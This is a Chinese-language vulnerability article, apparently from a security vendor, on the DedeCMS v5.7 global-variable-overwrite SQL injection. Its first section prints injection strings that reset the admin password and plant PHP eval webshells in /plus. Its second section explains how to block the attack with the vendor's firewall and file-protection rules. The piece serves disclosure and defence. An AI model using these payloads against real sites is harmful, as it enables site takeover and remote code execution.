首先我們一起來了解下 DedeCMS v5.7漏洞情況:
1、漏洞描述
漏洞所在版本:DedeCMS v5.7
漏洞發布時間:2013年06月07日
漏洞修復版本:DedeCMS v5.7 20130607之后版本
漏洞觸發條件:確保php.ini中使用php_mysql.dll同時未開啟php_mysqli.dll。
漏洞觸發根源:在於/include/dedesql.class.php
文件中程序未初始化
$arrs1和
$arrs2
這兩個數組,結合程序不安全的參數處理機制,導致我們能夠覆蓋程序中任意全局變量。因此我們可通過控制全局變量$GLOBALS['cfg_dbprefix']的值,進而通過$prefix值和/plus/download.php中的SQL語句構造,從而造成了此SQL注入漏洞。
由於DedeCMS使用廣泛,而此高危注入漏洞利用方便,並且能夠因此遠程獲取到管理后台管理員,或者可getshell獲取到系統的控制權。網上已公開的有以下3種EXP:
1.1修改后台管理員
(1)如:構造如下注入SQL語句:
cfg_dbprefixadmin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1
#修改后台管理員為:用戶名spider,密碼admin。
(2)對應的EXP:

(3)執行EXP后,相應后台數據庫表變為如下:

(4)因此相應后台登錄用戶變為spider密碼admin
1.2通過/plus/mytag_js.php文件生成一句話木馬php
(1)如:構造如下注入SQL語句:
cfg_dbprefixmytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''mybak.php'',''<?php eval($_POST[mybak]);?>'');{/dede:php}') # @`\'`
(2)對應的EXP:

(
3
)執行
EXP
后,將向數據庫表
dede_mytag
中插入一條記錄,如圖:

(4)執行如下語句,在/plus目錄下生成mybak.php一句話木馬
(5)使用菜刀工具進行連接
http://www.test.com/dedecms5.7/plus/mybak.php 密碼:mybak
1.3使/plus/ad_js.php文件變為一句話木馬php
(1)如:構造如下注入SQL語句:
cfg_dbprefixmyad` SET `normbody` = '<?php eval($_POST[m]);?>' WHERE `aid` =1 #
(2)對應的EXP:

(
3
)執行
EXP
后,將向數據庫表
dede_myad
中插入一條記錄,如圖;

(4)使用菜刀工具進行連接
http://www.test.com/dedecms5.7/plus/ad_js.php?aid=1 密碼:m

那要怎樣防范這種高危注入漏洞呢?下面我們一起來看看解決方法:
2、使用安全狗軟件防護該漏洞
由於攻擊者可能通過該漏洞進行各種惡意攻擊,並因此對網站造成較大的風險危害。為最大程度減少這種可能性,用戶可使用安全狗軟件對網站進行了以下全方位的防護。
2.1網站安全狗--網站漏洞EXP規則防護
(
1)安裝網站安全狗
3.0版本,安裝完成后,打開網站安全狗界面並修改網站保護級別為:
高級(即開啟所有防護),如下圖:

(2)切換界面:主動防御—SQL注入防護,查看規則列表中是否有相應“Dedecms5.7版本exp注入漏洞”防護規則。

若無,
可點擊如下圖所示“在線更新防護規則”按鈕,然后點擊“保存”按鈕完成更新防護規則列表
。如下圖所示:

(3)在完成以上操作后,我們打開瀏覽器輸入
DedeCMS 5.7注入漏洞
EXP,出現下圖內容,這也說明該攻擊已被網站安全狗攔截。

2.2網站安全狗--一句話木馬防護
若是在使用網站安全狗進行防護之前,網站已被植入一句話木馬;或者攻擊者可能繞過前面的網站漏洞
EXP規則防護,向網站植入了一句話木馬。此時可以使用網站安全狗的
第二重防護:一句話木馬防護,通過攔截菜刀等工具連接和命令執行,來阻止攻擊行為。具體如下:
(
1)打開網站安全狗界面,確認當前網站保護級別為:高級(即開啟所有防護),如下圖:

(2)切換到主動防御界面,點擊“在線更新防護規則”確認防護規則為最新版本。使用菜刀工具連接一句話木馬,出現如下圖畫面,可見菜刀工具的連接已被網站安全狗攔截防護。

(3)若是攻擊者繞過了菜刀工具連接防護,則網站安全狗將繼續對菜刀工具的命令執行行為進行攔截阻止。
在菜刀工具操作界面,右擊“更新緩存”命令,如下圖:

菜刀工具將出現如下界面,表明菜刀工具的命令執行已被網站安全狗攔截防護,以阻止攻擊者的進一步操作。

2.3利用服務器安全狗的文件目錄保護功能阻止未知攻擊
如上可知,該
Dedecms5.7注入漏洞有在網站目錄下生成一句話木馬的
EXP,針對該情況,用戶也可用服務器安全狗的文件目錄保護功能對該類型
EXP進行防護。
(1)安裝服務器安全狗,安裝完成后,打開服務器安全狗界面,通過服務器安全狗
-主動防御
-文件及目錄保護
-網站保護規則,手動新增規則:“
Dedecms5.7版本系統
exp規則”,將監控目錄設置為
DedeCMS網站站點的目錄,並勾選禁止寫入、禁止創建,如下圖:

(2)文件(夾)名包含的字符設置為:
*,文件擴展名規則設置為:
php|asp|aspx|asa|asax|ascx|ashx|asmx|cdx|cer|cgi|jsp,如下圖:

(3)通過以上規則設置后,在網站被攻擊者使用以下漏洞EXP類型時,
http://www.test.com/dedecms5.7/plus/mytag_js.php?aid=9013,
服務器安全狗就可直接攔截,避免攻擊者在網站/plus目錄下生成*.php、*.asp、*.aspx、*.asa、*.asax、*.ascx、*.ashx、*.asmx、*.cdx、*.cer、*.cgi、*.jsp等類型的一句話木馬文件,從而避免被進一步通過菜刀等工具獲取到系統控制權。
點擊下載規則:
禁止在Dedecms目錄下創建非法文件.rar (520 Bytes, 下載次數: 1699) (登陸論壇后可下載該規則)

備注:快速添加以上防護規則:直接使用服務器安全狗--主動防御--文件及目錄保護界面的“導入規則”功能導入下載的xml文件格式規則,並點擊修改導入的規則.
(注意把規則中的保護目錄換成您自己網站的目錄)